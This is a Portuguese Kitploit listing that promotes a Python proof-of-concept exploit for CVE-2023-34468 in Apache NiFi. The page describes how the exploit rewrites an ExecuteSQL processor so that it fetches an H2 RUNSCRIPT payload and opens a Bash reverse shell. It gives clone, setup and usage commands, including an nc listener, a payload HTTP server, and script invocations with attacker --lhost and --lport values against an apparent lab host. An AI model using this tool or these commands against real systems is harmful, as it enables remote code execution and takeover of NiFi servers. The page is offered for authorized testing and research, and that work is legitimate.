Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-34468 — CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC | Kitploit
Ferramentas/GitHubGitHub/ozcanpng/cve-2023-34468
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed TeamingDesenvolvimento de Payloads
GitHubozcanpng/cve-2023-34468

CVE-2023-34468

CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

Ver Repositório
3há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-34468 — Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

PoC curto em Python para abusar de um processador ExecuteSQL editável do Apache NiFi com um payload H2 RUNSCRIPT para acionar execução remota de comandos através de um reverse shell Bash.

Apenas para testes autorizados e pesquisa. Não use contra sistemas que você não possui ou não tem permissão explícita para testar.


O que faz

root@kitploit:~
ExecuteSQL processor update -> H2 RUNSCRIPT fetch -> Bash reverse shell -> processor restore
  1. Descobre automaticamente um único processador ExecuteSQL, ou aceita --processor-id manualmente.
  2. Escreve um payload local rce.sql que define e chama um alias de execução shell com suporte Java.
  3. Solicita que você inicie seu próprio listener nc e servidor HTTP.
  4. Atualiza a consulta do processador para buscar rce.sql através do H2 RUNSCRIPT.
Baixar ferramenta
  • Inicia o processador para acionar o reverse shell.
  • Restaura a configuração original do processador após você confirmar que o shell foi estabelecido.

  • Capturas de tela

    1. Configuração

    Setup

    2. Solicitação ao payload

    Exploit run

    3. Shell recebido

    Processor update

    4. Resultado

    Result


    Configuração

    root@kitploit:~
    git clone https://github.com/ozcanpng/CVE-2023-34468.git
    cd CVE-2023-34468
    python3 -m venv .venv
    source .venv/bin/activate
    pip install -r requirements.txt
    

    Uso

    Terminal 1:

    root@kitploit:~
    rlwrap nc -lvnp 4444
    

    Terminal 2:

    root@kitploit:~
    python3 -m http.server 8000
    

    Terminal 3:

    root@kitploit:~
    python3 CVE-2023-34468.py --url http://flow.helix.htb --lhost 10.10.16.53 --lport 4444
    

    Para seleção manual do processador:

    root@kitploit:~
    python3 CVE-2023-34468.py --url http://flow.helix.htb --processor-id <UUID> --lhost 10.10.16.53 --lport 4444
    

    Afetados

    ProdutoVersão AfetadaAcesso NecessárioImpacto
    Apache NiFiImplementações afetadas pelo CVE-2023-34468 que usam comportamento editável do ExecuteSQL/H2Capacidade de alcançar e modificar o processador NiFi alvo através da APIExecução remota de comandos

    Notas

    • O script assume que a API do NiFi está acessível e que o usuário/sessão atual pode modificar o processador alvo.
    • O arquivo rce.sql gerado é ignorado pelo git e deve ser servido a partir do diretório do repositório com python3 -m http.server.
    • Se a descoberta automática não encontrar nenhum processador ou encontrar múltiplos candidatos, passe o UUID do processador manualmente com --processor-id.
    • O script tenta restaurar a configuração original do processador ExecuteSQL após você confirmar que o shell foi estabelecido.

    Referências

    • NVD — CVE-2023-34468
    • Apache NiFi
    • Comandos do Banco de Dados H2

    Autor

    ozcanpng — github.com/ozcanpng — ozcanpng.dev